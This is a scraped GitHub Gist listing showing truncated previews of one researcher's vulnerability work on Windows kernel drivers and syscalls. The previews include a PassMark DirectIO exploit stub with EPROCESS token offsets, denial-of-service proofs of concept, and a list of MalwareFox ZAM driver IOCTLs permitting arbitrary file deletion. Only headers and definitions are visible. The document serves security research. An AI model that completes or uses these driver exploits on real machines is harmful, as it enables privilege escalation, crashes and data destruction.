Skip to content

Instantly share code, notes, and snippets.

@hfiref0x
hfiref0x / directio.c
Created Apr 26, 2021
PassMark DirectIO memory mapping IOCTL's reconst
View directio.c
typedef struct _MAP_PARAMS {
HANDLE SectionHandle;
PVOID MapBaseAddressIoSpace;
PMDL AllocatedMdl;
DWORD MapSize;
LARGE_INTEGER Offset;
PVOID MapBaseAddress;
BOOLEAN Writeable;
} MAP_PARAMS, *PMAP_PARAMS; //sizeof 45 bytes
@hfiref0x
hfiref0x / passmarkdrv.cpp
Created Apr 26, 2021
PassMark DirectIO exploit
View passmarkdrv.cpp
#include "global.h"
#define EPROCESS_UniqueProcessId_1809 0x2E0
#define EPROCESS_ActiveProcessLinks_1809 EPROCESS_UniqueProcessId_1809 + sizeof(HANDLE)
#define EPROCESS_Token_1809 0x358
#define EPROCESS_UniqueProcessId_1903 0x02E8
#define EPROCESS_ActiveProcessLinks_1903 EPROCESS_UniqueProcessId_1903 + sizeof(HANDLE)
#define EPROCESS_Token_1903 0x360
@hfiref0x
hfiref0x / NtUserSetWindowsHookEx.cpp
Created Feb 19, 2021
Denial of Service bug in Windows 10 (21313 build) NtUserSetWindowsHookEx
View NtUserSetWindowsHookEx.cpp
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtUserSetWindowsHookEx)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4,
ULONG_PTR Param5,
ULONG_PTR Param6);
@hfiref0x
hfiref0x / NtCreateIoRing.cpp
Created Feb 19, 2021
Denial of Service bug in Windows 10 (21313 build) NtCreateIoRing
View NtCreateIoRing.cpp
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtCreateIoRing)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4
);
View fusion.c
#include <fusion.h>
typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(
_Out_ IAssemblyEnum** pEnum,
_In_opt_ IUnknown* pUnkReserved,
_In_opt_ IAssemblyName* pName,
_In_ DWORD dwFlags,
_Reserved_ LPVOID pvReserved);
typedef HRESULT(WINAPI* pfnCreateAssemblyCache)(
@hfiref0x
hfiref0x / enetech_new.c
Created Aug 12, 2020
EneTech newest variant (May 2020) unlock, (app+dll)
View enetech_new.c
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
View gist:720e2caf58a770117caa1d51d2745491
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
@hfiref0x
hfiref0x / SecureAPlus.c
Created Feb 28, 2020
SecureAPlus driver DoS
View SecureAPlus.c
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / imf.c
Created Feb 26, 2020
IObit Malware Fighter ImfObCallback.sys features
View imf.c
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / zam.md
Created Feb 26, 2020
MalwareFox ZAM backdoor IOCTL list
View zam.md

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).